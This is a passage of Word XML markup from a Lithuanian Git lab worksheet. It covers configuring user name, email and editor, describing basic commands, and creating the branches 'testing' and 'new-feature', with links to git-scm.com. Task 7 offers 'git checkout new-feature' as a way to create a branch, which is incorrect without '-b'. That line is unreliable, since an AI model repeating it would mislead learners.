        <w:t>Git versijavimo įrankį galite atsiųsti iš čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Downloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId211" w:history="1">
        <w:r w:rsidRPr="00BE02E6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/downloads.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE02E6">
        <w:rPr>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Diegimo instrukcija:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Getting Started - Installing Git</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId212" w:history="1">
        <w:r w:rsidRPr="00BE02E6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Getting-Started-Installing-Git.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BE02E6">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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKONFIGŪRUOKITE GIT SAUGYKLĄ: NUSTATYKITE GIT VARTOTOJO VARDĄ, ELEKTRONINĮ PAŠTĄ, NAUDOJAMĄ TEKSTINĮ REDAKTORIŲ</w:t>
      </w:r>
      <w:r w:rsidR="00BE02E6">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git saugyklos konfigūravimas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Vartotojo vardo nustatymas: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>git config --global user.name "John Doe"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Vartotojo elektroninio pašto nustatymas: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>git config --global user.email johndoe@example.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Vartotojo tekstinio redaktoriaus nustatymas: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>git config --global core.editor emacs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="284"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai apie Git konfigūravimą galite paskaityti čia:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Getting Started - First-Time Git Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId213" w:history="1">
        <w:r w:rsidRPr="00BE02E6">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>4 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. PAPILDYKITE SAVO GIT KONFIGŪRACIJĄ (žiūrėti 3 užduotį) PARAMETRAIS: COMMIT.TEMPLATE, CORE.PAGER, CORE.EXCLUDEFILE, HELP.AUTOCORRECT, COLOR.*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Konfigūruojant papildomus parametrus naudokite šią instrukciją:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Customizing Git - Git Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId214" w:history="1">
        <w:r w:rsidRPr="006E4C09">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Customizing-Git-Git-Configuration.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E4C09">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5 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE BAZINES GIT KOMANDAS: GIT INIT, GIT CLONE, GIT STATUS</w:t>
      </w:r>
      <w:r w:rsidR="006E4C09">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti šiuos šaltinius:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. git init: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId215" w:history="1">
        <w:r w:rsidRPr="006E4C09">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-init</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E4C09">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. git clone: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId216" w:history="1">
        <w:r w:rsidRPr="006E4C09">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-clone</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E4C09">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. git status: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId217" w:history="1">
        <w:r w:rsidRPr="006E4C09">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-status</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E4C09">
        <w:rPr>
          <w:iCs/>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Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git Basics - Getting a Git Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId218" w:history="1">
        <w:r w:rsidRPr="006E4C09">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="006E4C09">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6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">  APRAŠYKITE BAZINES GIT KOMANDAS: GIT ADD, GIT COMMIT, GIT RESET, GIT CHECKOUT</w:t>
      </w:r>
      <w:r w:rsidR="006E4C09">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aprašymui galite naudoti šiuos šaltinius:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. git add: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId219" w:history="1">
        <w:r w:rsidRPr="00554B76">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-add</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00554B76">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. git commit: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId220" w:history="1">
        <w:r w:rsidRPr="00554B76">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-commit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00554B76">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">3. git reset: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId221" w:history="1">
        <w:r w:rsidRPr="00554B76">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-reset</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">4. git checkout: </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId222" w:history="1">
        <w:r w:rsidRPr="00BA48F2">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-checkout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Papildomai galite paskaityti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Git (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git Basics - Getting a Git Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId223" w:history="1">
        <w:r w:rsidRPr="00DA2280">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00DA2280">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7 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE GIT KOMANDAS, KURIOS LEIS SUKURTI NAUJAS PROJEKTO ŠAKAS: TESTING, NEW-FEATURE. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naujų Git šakų sukurimui naudojame komandas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1. git branch testing arba git checkout -b testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>2. git branch new-feature arba git checkout new-feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARAŠYKITE GIT KOMANDAS, KURIOS LEIS APJUNGTI </w:t>
      </w:r>
      <w:r w:rsidRPr="00504D42">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>7 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURTAS ŠAKAS SU P</w:t>
      </w:r>
      <w:r w:rsidR="00EE5F65" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>AGRINDINE SAUGYKLOS ŠAKA MASTER</w:t>
      </w:r>
      <w:r w:rsidR="00504D42">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00616C06" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
